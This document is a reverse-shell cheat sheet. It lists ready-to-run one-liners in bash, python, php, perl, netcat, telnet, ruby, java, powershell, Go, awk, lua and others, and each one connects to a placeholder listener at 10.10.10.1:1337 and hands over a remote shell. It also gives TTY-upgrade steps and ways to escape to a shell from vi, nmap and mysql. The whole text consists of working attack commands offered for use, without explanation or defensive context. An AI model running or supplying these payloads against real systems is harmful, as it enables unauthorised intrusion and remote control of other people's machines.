Replace the IP address (10.10.10.1) and port (1337) in the examples below with the address and port of your own listener.
- bash:
Shell 1 (tcp): bash -i >& /dev/tcp/10.10.10.1/1337 0>&1
Shell 2 (tcp): 0<&196;exec 196<>/dev/tcp/10.10.10.1/1337; sh <&196 >&196 2>&196
Shell 3 (udp): sh -i >& /dev/udp/10.10.10.1/1337 0>&1
listen with nc -u -lvp 1337
- python:
Shell: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
File: pyrev.py
- php:
Shell: php -r '$sock=fsockopen("10.10.10.1",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
File: phprev.php
- perl:
Shell 1: perl -e 'use Socket;$i="10.10.10.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Shell 2 (windows): perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.1:1337");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Shell 3 (windows): perl -e 'use Socket;$i="10.10.10.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
- netcat:
Shell 1 : nc -e /bin/sh 10.10.10.1 1337
Shell 2: /bin/sh | nc 10.10.10.1 1337
Shell 3: rm -f /tmp/z; mknod /tmp/z z && nc 10.10.10.1 1337 0/tmp/z
- telnet:
Shell 1: rm -f /tmp/z; mknod /tmp/z z && telnet 10.10.10.1 1337 0/tmp/z
Shell 2: telnet 10.10.10.1 80 | /bin/bash | telnet 10.10.10.1 443
(listen on 443)
- ruby:
Shell: ruby -rsocket -e'f=TCPSocket.open("10.10.10.1",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- java:
Shell:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.1/1337;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
- xterm:
Shell: xterm -display 10.10.10.1:1337
- socat:
Shell: /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.1:1337
listen with socat file:'tty',raw,echo=0 TCP-L:1337
- powershell:
Shell 1: powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.1",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Shell 2: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.1',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
- Golang:
Shell: echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.10.10.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
- awk:
Shell: awk 'BEGIN {s = "/inet/tcp/0/10.10.10.1/1337"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
- lua:
Shell 1: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.1','1337');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Shell 2 (windows): lua5.1 -e 'local host, port = "10.10.10.1", 1337 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
ctrl+z
echo $TERM && tput lines && tput cols
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
Spawn a TTY shell from an interpreter:
/bin/sh -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c "__import__('pty').spawn('/bin/bash')"
python3 -c "__import__('subprocess').call(['/bin/bash'])"
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
perl -e 'print `/bin/bash`'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
vi: :!bash
vi: :set shell=/bin/bash:shell
nmap: !sh
mysql: ! bash